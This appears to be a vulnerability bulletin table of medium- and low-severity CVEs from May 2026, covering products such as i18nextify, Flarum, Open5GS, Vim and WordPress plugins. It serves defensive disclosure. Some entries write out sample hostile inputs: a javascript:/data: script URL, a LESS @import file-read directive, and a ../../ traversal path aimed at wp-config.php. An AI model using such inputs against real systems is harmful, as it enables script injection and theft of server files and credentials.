| i18next--i18nextify | i18nextify is a JavaScript library that adds website internationalization via a script tag, without source code changes. Versions prior to 4.0.8 substitute {{key}} interpolation tokens inside src and href attribute values with the raw string returned by i18next.t(). The substitution logic in src/localize.js (the replaceInside handler) only guards against a duplicated http:// origin prefix - it does not validate the URL scheme of the substituted value. A translated value such as javascript:alert(1) or data:text/html,<script>...</script> is applied unchanged to the live DOM attribute when an attacker can influence the content of a translation file or the translation-backend response - for example, via a compromised translation CDN, user-contributed locales, a MITM on a plain-HTTP backend, or write access to the translation JSON. This issue was patched in version 4.0.8. | 2026-05-07 | 4.7 | CVE-2026-41692 | https://github.com/i18next/i18nextify/security/advisories/GHSA-6457-mxpq-4fqq https://github.com/i18next/i18nextify/commit/16f23dbcdcf893673587f7a03355bf7ce0a0e49e |
| flarum--framework | Flarum is open-source forum software. Prior to versions 1.8.16 and 2.0.0-rc.1, Flarum's patch for CVE-2023-27577 restricted the @import and data-uri() LESS features in the custom_less setting, but the same restriction was never applied to other settings registered as LESS config variables (for example theme_primary_color and theme_secondary_color, as well as any key registered via Extend\Settings::registerLessConfigVar()). Those values are interpolated verbatim into the LESS source at compile time, allowing an authenticated administrator to craft a theme-color value that injects an arbitrary @import directive into the compiled forum.css. Because the underlying LESS parser honours @import (inline) '<path>', an attacker can read arbitrary files reachable by the PHP process (local file inclusion) or trigger outbound HTTP(S) requests (server-side request forgery). This issue has been patched in versions 1.8.16 and 2.0.0-rc.1. | 2026-05-08 | 4.9 | CVE-2026-41887 | https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878 https://github.com/flarum/framework/commit/2d90a1f19f0e46f8c7e1b07c48ba74b5e38f8410 https://github.com/flarum/framework/releases/tag/v1.8.16 https://github.com/flarum/framework/releases/tag/v2.0.0-rc.1 |
| icip-cas--PPTAgent | PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, PPTAgent is vulnerable to arbitrary file write and directory creation via markdown_table_to_image. This issue has been patched via commit 418491a. | 2026-05-04 | 4.6 | CVE-2026-42078 | https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-hrcw-xc63-g29m https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00 |
| icip-cas--PPTAgent | PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, there is an arbitrary file write vulnerability via `save_generated_slides`. This issue has been patched via commit 418491a. | 2026-05-04 | 4.6 | CVE-2026-42080 | https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-pxhg-7xr2-w7xg https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to versions 6.10.5 and 7.0.0-rc3, OpenC3 COSMOS contains a design flaw in the save_tool_config() function that allows saving tool configuration files at arbitrary locations inside the shared /plugins directory tree by supplying crafted configuration filenames. Although the implementation sufficiently mitigates standard path traversal attacks, by canonicalizing filename to an absolute path, all plugins share this same root directory. That enables users to create arbitrary file structures and overwrite existing configuration files within the shared /plugins directory. This issue has been patched in versions 6.10.5 and 7.0.0-rc3. | 2026-05-04 | 4.3 | CVE-2026-42085 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-4jvx-93h3-f45h https://github.com/OpenC3/cosmos/commit/9957a9fa460c0c0cf5cdbf6a5931bbdd025246a5 https://github.com/OpenC3/cosmos/commit/e6efccbd148ba0e3361c5891027f2373aa140d42 https://github.com/OpenC3/cosmos/releases/tag/v6.10.5 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0, the Command Sender UI uses an unsafe eval() function on array-like command parameters, which allows a user-supplied payload to execute in the browser when sending a command. This creates a self-XSS risk because an attacker can trigger their own script execution in the victim's session, if allowed to influence the array parameter input, for example via phishing. If successful, an attacker may read or modify data in the authenticated browser context, including session tokens in local storage. This issue has been patched in version 7.0.0. | 2026-05-04 | 4.6 | CVE-2026-42086 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-ffq5-qpvf-xq7x |
| xwiki-contrib--macro-plantuml | PlantUML Macro is a macro for rendering UML diagrams from simple textual schemes. Prior to version 2.4.1, the PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the server parameter. However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram. This issue has been patched in version 2.4.1. | 2026-05-04 | 4.4 | CVE-2026-42140 | https://github.com/xwiki-contrib/macro-plantuml/security/advisories/GHSA-42fc-7w97-8vrc https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c https://jira.xwiki.org/browse/PLANTUML-25 |
| onyx-dot-app--onyx | Onyx is an open-source AI platform. Prior to versions 3.0.9, 3.1.6, and 3.2.6, the POST /chat/stop-chat-session/{chat_session_id} endpoint lets any authenticated user stop any other user's active chat session. The endpoint checks authentication but never verifies the session belongs to the caller. An attacker who knows a chat session UUID can kill another user's LLM generation mid-stream. This issue has been patched in versions 3.0.9, 3.1.6, and 3.2.6. | 2026-05-08 | 4.3 | CVE-2026-42276 | https://github.com/onyx-dot-app/onyx/security/advisories/GHSA-rw6w-hp62-gc8w |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to version 2.47.13, when n8n-mcp runs in HTTP transport mode, authenticated MCP tools/call requests had their full arguments and JSON-RPC params written to server logs by the request dispatcher and several sibling code paths before any redaction. When a tool call carries credential material - most notably n8n_manage_credentials.data - the raw values can be persisted in logs. In deployments where logs are collected, forwarded to external systems, or viewable outside the request trust boundary (shared log storage, SIEM pipelines, support/ops access), this can result in disclosure of: bearer tokens and OAuth credentials sent through n8n_manage_credentials, per-tenant API keys and webhook auth headers embedded in tool arguments, arbitrary secret-bearing payloads passed to any MCP tool. The issue requires authentication (AUTH_TOKEN accepted by the server), so unauthenticated callers cannot trigger it; the runtime exposure is also reduced by an existing console-silencing layer in HTTP mode, but that layer is fragile and the values are still constructed and passed into the logger. This issue has been patched in version 2.47.13. | 2026-05-08 | 4.3 | CVE-2026-42282 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-wg4g-395p-mqv3 https://github.com/czlonkowski/n8n-mcp/commit/59b665bda36797823df238aeaf20adb862c9f451 https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.47.13 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0383, an OS command injection vulnerability exists in the netrw standard plugin bundled with Vim. By inducing a user to open a crafted URL (e.g., using the sftp:// or file:// protocol handlers), an attacker can execute arbitrary shell commands with the privileges of the Vim process. This issue has been patched in version 9.2.0383. | 2026-05-08 | 4.4 | CVE-2026-42307 | https://github.com/vim/vim/security/advisories/GHSA-85ch-p2qr-m5gx https://github.com/vim/vim/commit/405e2fb6d54d5653523809e2853d99d1c000a5fc https://github.com/vim/vim/releases/tag/v9.2.0383 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to version 1.12.1, GET /api/workspace/:slug/tts/:chatId in AnythingLLM returns the text-to-speech audio for another user's chat response within the same workspace because the route validates workspace membership but does not enforce ownership of the targeted chat row. As a result, an authenticated user can access another user's private assistant response in audio form if the chatId is known or guessed. This constitutes an insecure direct object reference (IDOR) affecting private chat response content exposed through the TTS endpoint. This issue has been patched in version 1.12.1. | 2026-05-08 | 4.3 | CVE-2026-42456 | https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-jwqg-jfg3-x5vv https://github.com/Mintplex-Labs/anything-llm/commit/4f3f77119d342e5489d1ba7533ad6d51bdcd565f https://github.com/Mintplex-Labs/anything-llm/releases/tag/v1.12.1 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 contains an arbitrary file read vulnerability in the QMD backend memory_get function that allows callers to read any Markdown files within the workspace root. Attackers with access to the memory tool can bypass path restrictions by providing arbitrary workspace Markdown paths to read files outside canonical memory locations or indexed QMD result sets. | 2026-05-06 | 4.3 | CVE-2026-44111 | GitHub Security Advisory (GHSA-f934-5rqf-xx47) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.15 - Arbitrary Markdown File Read via QMD memory_get |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, the screenshots, tasks, and component link API allowed for the enumeration of translations in a project inaccessible to the user. This issue has been patched in version 5.17.1. | 2026-05-07 | 4.3 | CVE-2026-44263 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-gcg5-86jr-f7jg https://github.com/WeblateOrg/weblate/pull/19258 https://github.com/WeblateOrg/weblate/commit/6cf892c7bd50b667a65a99d716a90694f7d9f203 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, the Markdown renderer used in user comments and other user-provided content didn't properly sanitize some attributes. This issue has been patched in version 5.17.1. | 2026-05-07 | 4.3 | CVE-2026-44264 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-5cmv-3rc4-7279 https://github.com/WeblateOrg/weblate/pull/19259 https://github.com/WeblateOrg/weblate/commit/85abc9df88b7464f4c0e794aef752e45f4230f75 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| kimai--kimai | Kimai is an open-source time tracking application. From version 2.32.0 to before version 2.56.0, users with the role System-Admin (ROLE_SYSTE_ADMIN) and the permission upload_invoice_template can upload PDF invoice templates, which can call pdfContext.setOption('associated_files', ...) inside the sandboxed Twig render. This is forwarded to mPDF's SetAssociatedFiles(), whose writer calls file_get_contents($entry['path']) during PDF output and embeds the bytes as a FlateDecode stream in the PDF. Any file readable by the PHP worker is returned to the attacker inside the rendered invoice. This issue has been patched in version 2.56.0. | 2026-05-08 | 4.1 | CVE-2026-44298 | https://github.com/kimai/kimai/security/advisories/GHSA-h5fh-7hwr-97mw https://github.com/kimai/kimai/releases/tag/2.56.0 |
| ZTE--ZXCLOUD iRAI | A remote denial-of-service vulnerability exists in the ZTE Cloud PC client uSmartview, which may lead to memory corruption and remote denial of service. | 2026-05-07 | 4.7 | CVE-2026-44407 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/4783596796997009530 |
| techjewel--Fluent Forms Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder | The Fluent Forms plugin for WordPress is vulnerable to Arbitrary File Read in versions up to and including 6.2.1. This is due to insufficient path validation in the getAttachments() method of EmailNotificationActions, which resolves attacker-supplied file-upload URLs into filesystem paths without verifying that the resolved path stays inside the WordPress uploads directory: a strpos() prefix check on the raw URL can be bypassed with traversal sequences, wp_normalize_path() does not resolve ".\..\" segments, and file_exists() then resolves them at the kernel level. This makes it possible for authenticated attackers with administrator access to read arbitrary files readable by the web-server user - including wp-config.php with its database credentials and authentication salts - by submitting a form whose admin notification is configured to attach a file-upload field and supplying a crafted URL of the shape <upload_baseurl>/../../<target> as the file-field value. The resolved file is attached to the outbound admin-notification email via wp_mail(). While the email can be triggered by unauthenticated users, the email recipient is not user-controlled. | 2026-05-06 | 4.9 | CVE-2026-6344 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0101113b-70c2-4db4-b6b1-b2412f6e1214?source=cve https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L121 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L130 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L133 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L135 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L137 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L151 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Hooks/Ajax.php#L17 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Modules/SubmissionHandler/SubmissionHandler.php#L17 https://plugins.trac.wordpress.org/changeset/3513845/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php |
| n/a--PgBouncer | PgBouncer before 1.25.2 did not perform an appropriate authorization check for the KILL_CLIENT admin command. All users with access to the administration console (which itself requires authorization) could run this command. It would have been correct to allow only users listed in the admin_users parameter. | 2026-05-09 | 4.3 | CVE-2026-6667 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| xavortm--DX Sources | The DX Sources plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the settings_page_build function. This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a forged request that modifies the plugin's configuration options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-05 | 4.3 | CVE-2026-6700 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c96e57-0300-4ea7-a0c6-5d060b6e979d?source=cve https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L46 https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L46 https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L79 https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L79 |
| kazunii--addfreespace | The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-05 | 4.3 | CVE-2026-6701 | https://www.wordfence.com/threat-intel/vulnerabilities/id/40eaeb28-c721-4977-951d-582b7dc2bd12?source=cve https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L45 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L45 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L30 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L30 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L59 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L59 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L312 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L312 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L83 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L83 |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.5 and 5.2 before 5.2.14. `django.middleware.cache.UpdateCacheMiddleware` erroneously caches requests where the `Vary` header contained an asterisk (`'*'`). This can lead to private data being stored and served. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Ahmad Sadeddin for reporting this issue. | 2026-05-05 | 4.3 | CVE-2026-6907 | Django security archive Django releases announcements Django security releases issued: 6.0.5 and 5.2.14 |
| Velocidex--velociraptor | An off-by-one error (CWE-193) in the ConsumeUnit16Array and ConsumeUnit64Array functions in Velocidex Velociraptor before version 0.76.5 on Windows and Linux allows a local attacker to cause a Denial of Service (DoS) via a process crash by providing a specially crafted .evtx file to the parse_evtx VQL plugin. | 2026-05-06 | 4.4 | CVE-2026-7572 | https://docs.velociraptor.app/announcements/advisories/cve-2026-7572/ |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.7. Affected is the function udm_nudr_dr_handle_subscription_authentication of the file /src/udm/nudr-handler.c of the component authentication-subscription Endpoint. Performing a manipulation results in denial of service. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 4.3 | CVE-2026-7779 | VDB-360976 | Open5GS authentication-subscription Endpoint nudr-handler.c udm_nudr_dr_handle_subscription_authentication denial of service VDB-360976 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806249 | Open5gs UDM v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4418 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A weakness has been identified in Open5GS up to 2.7.7. Affected by this vulnerability is the function udm_state_operational of the file /src/udm/udm-sm.c of the component smf-registrations Endpoint. Executing a manipulation can lead to denial of service. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 4.3 | CVE-2026-7780 | VDB-360977 | Open5GS smf-registrations Endpoint udm-sm.c udm_state_operational denial of service VDB-360977 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806250 | Open5gs UDM v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4419 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A security vulnerability has been detected in Open5GS up to 2.7.7. Affected by this issue is the function udm_nudm_uecm_handle_amf_registration_update of the file /src/udm/nudm-handler.c of the component amf-3gpp-access Endpoint. The manipulation leads to denial of service. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 4.3 | CVE-2026-7781 | VDB-360978 | Open5GS amf-3gpp-access Endpoint nudm-handler.c udm_nudm_uecm_handle_amf_registration_update denial of service VDB-360978 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806251 | Open5gs UDM v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4420 https://github.com/open5gs/open5gs/ |
| FlowiseAI--Flowise | A weakness has been identified in FlowiseAI Flowise up to 3.0.12. Affected by this vulnerability is an unknown functionality of the component User Controller Handler. This manipulation of the argument userId/organizationId/workspaceId/email causes authorization bypass. The attack may be initiated remotely. The affected component should be upgraded. | 2026-05-06 | 4.3 | CVE-2026-8027 | VDB-361274 | FlowiseAI Flowise User Controller authorization VDB-361274 | CTI Indicators (IOB, IOC, IOA) Submit #777657 | FlowiseAI Flowise <= 3.0.12 Authorization Bypass Through User-Controlled Key (CWE-639) https://gist.github.com/YLChen-007/3584e6ffa0bba6367328ecf0b46b0e4b |
| 8421bit--MiniClaw | A vulnerability was determined in 8421bit MiniClaw up to 43905b934cf76489ab28e4d17da28ee97970f91f. Affected by this vulnerability is the function isPathInside of the file src/kernel.ts of the component executeSkillScript. Executing a manipulation can lead to path traversal. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. This patch is called e8bd4e17e9428260f2161378356affc5ce90d6ed. It is advisable to implement a patch to correct this issue. | 2026-05-07 | 4.3 | CVE-2026-8113 | VDB-361901 | 8421bit MiniClaw executeSkillScript kernel.ts isPathInside path traversal VDB-361901 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808167 | 8421bit MiniClaw 0 Path Traversal https://github.com/8421bit/MiniClaw/issues/5 https://github.com/8421bit/MiniClaw/pull/8 https://github.com/8421bit/MiniClaw/commit/e8bd4e17e9428260f2161378356affc5ce90d6ed https://github.com/8421bit/MiniClaw/ |
| SourceCodester--Pizzafy Ecommerce System | A security vulnerability has been detected in SourceCodester Pizzafy Ecommerce System 1.0. This issue affects some unknown processing of the file /admin/index.php. Such manipulation of the argument page leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-05-07 | 4.3 | CVE-2026-8117 | VDB-361905 | SourceCodester Pizzafy Ecommerce System index.php cross site scripting VDB-361905 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808327 | sourcecodester Pizzafy Ecommerce System V1.0 Cross Site Scripting https://github.com/redshadowword-cell/CVE/issues/5 https://www.sourcecodester.com/ |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.7. The affected element is the function nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf of the file /src/nssf/nnssf-handler.c of the component NSSF. Executing a manipulation can lead to denial of service. The attack can be executed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8120 | VDB-361907 | Open5GS NSSF nnssf-handler.c denial of service VDB-361907 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808421 | Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4432 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. The impacted element is the function ogs_sbi_parse_plmn_list in the library /lib/sbi/conv.c of the component NSSF. The manipulation leads to denial of service. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8121 | VDB-361908 | Open5GS NSSF conv.c ogs_sbi_parse_plmn_list denial of service VDB-361908 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808422 | Open5gs NSSF v2.7.7 Denial of Service Submit #808424 | Open5gs NSSF v2.7.7 Denial of Service (Duplicate) https://github.com/open5gs/open5gs/issues/4433 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. This affects the function ogs_sbi_discovery_option_add_service_names in the library /lib/sbi/message.c of the component NSSF. The manipulation results in denial of service. The attack may be performed from remote. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8122 | VDB-361909 | Open5GS NSSF message.c ogs_sbi_discovery_option_add_service_names denial of service VDB-361909 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808425 | Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4435 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. This impacts the function ogs_sbi_discovery_option_add_snssais in the library /lib/sbi/message.c of the component NSSF. This manipulation causes denial of service. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8123 | VDB-361910 | Open5GS NSSF message.c ogs_sbi_discovery_option_add_snssais denial of service VDB-361910 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808426 | Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4436 https://github.com/open5gs/open5gs/ |
| n/a--osTicket | A security vulnerability has been detected in osTicket up to 1.18.3. Impacted is an unknown function of the file include/class.dispatcher.php of the component Dispatcher. The manipulation of the argument _method leads to cross-site request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-09 | 4.3 | CVE-2026-8194 | VDB-362346 | osTicket Dispatcher class.dispatcher.php cross-site request forgery VDB-362346 | CTI Indicators (IOB, IOC, IOA) Submit #802755 | osTicket 1.18.3 Cross-Site Request Forgery https://github.com/osTicket/osTicket/pull/6945 https://github.com/az10b/security-advisories/blob/main/csrf_bypass_osTicket.md https://github.com/osTicket/osTicket/ |
| n/a--JeecgBoot | A vulnerability was detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java of the component SVG File Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 4.3 | CVE-2026-8195 | VDB-362347 | JeecgBoot SVG File CommonController.java cross site scripting VDB-362347 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803528 | jeecgboot JeecgBoot 3.9.1 Doubled Character XSS Manipulations https://github.com/xpp3901/CVE_APPLY/blob/main/V-006_SVG_Stored_XSS/README.md |
| codelibs--Fess | A vulnerability was detected in codelibs Fess up to 15.5.1. Affected by this issue is the function update of the file org/codelibs/fess/app/web/admin/design/AdminDesignAction.java of the component JSP File Handler. The manipulation of the argument content results in code injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 4.7 | CVE-2026-8211 | VDB-362419 | codelibs Fess JSP File AdminDesignAction.java update code injection VDB-362419 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #804293 | CodeLibs Fess 15.5.1 Arbitrary File Write https://bv3acdnplbr.feishu.cn/docx/Kk1tdEAfAoV6kZxVozUc8UA4nog?from=from_copylink |
| Dotouch--XproUPF | A vulnerability was determined in Dotouch XproUPF 2.0.0-release-088aa7c4. Affected is an unknown function of the component UPF. This manipulation causes improper access controls. A high degree of complexity is needed for the attack. The exploitability is told to be difficult. The vendor was contacted early about this disclosure. | 2026-05-10 | 4.6 | CVE-2026-8233 | VDB-362450 | Dotouch XproUPF access control VDB-362450 | CTI Indicators (IOB, IOC, TTP) Submit #808799 | Dotouch XproUPF v2.0.0-release-088aa7c4 imp |
| n/a--Open5GS | A vulnerability was detected in Open5GS up to 2.7.7. The affected element is the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. The manipulation results in denial of service. The attack may be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8248 | VDB-362545 | Open5GS SMF npcf-handler.c update_authorized_pcc_rule_and_qos denial of service VDB-362545 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808472 | Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4442 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.7. The impacted element is the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. This manipulation causes denial of service. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8249 | VDB-362546 | Open5GS SMF npcf-handler.c update_authorized_pcc_rule_and_qos denial of service VDB-362546 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808473 | Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4443 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. This affects the function smf_n4_build_qos_flow_to_modify_list of the file /src/smf/n4-build.c of the component SMF. Such manipulation leads to denial of service. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8250 | VDB-362547 | Open5GS SMF n4-build.c smf_n4_build_qos_flow_to_modify_list denial of service VDB-362547 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808476 | Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4444 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. This impacts the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. Performing a manipulation results in denial of service. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8251 | VDB-362548 | Open5GS SMF npcf-handler.c update_authorized_pcc_rule_and_qos denial of service VDB-362548 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808480 | Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4445 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. Affected is the function smf_nsmf_handle_create_data_in_hsmf of the component SMF. Executing a manipulation can lead to null pointer dereference. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8252 | VDB-362549 | Open5GS SMF smf_nsmf_handle_create_data_in_hsmf null pointer dereference VDB-362549 | CTI Indicators (IOB, IOC, IOA) Submit #808482 | Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4446 https://github.com/open5gs/open5gs/ |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared. . | 2026-05-06 | 3.5 | CVE-2025-31959 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is susceptible to a Root File System Not Mounted as Read-Only. An improperly configured root file system may allow unintended modifications to critical system components, potentially increasing the risk of system compromise or unauthorized changes. | 2026-05-06 | 3.9 | CVE-2025-31974 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) had directories that were not linked or publicly visible but could be accessed directly. This could allow an increased risk of information disclosure or misuse of sensitive functionality. | 2026-05-06 | 3.7 | CVE-2025-31982 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
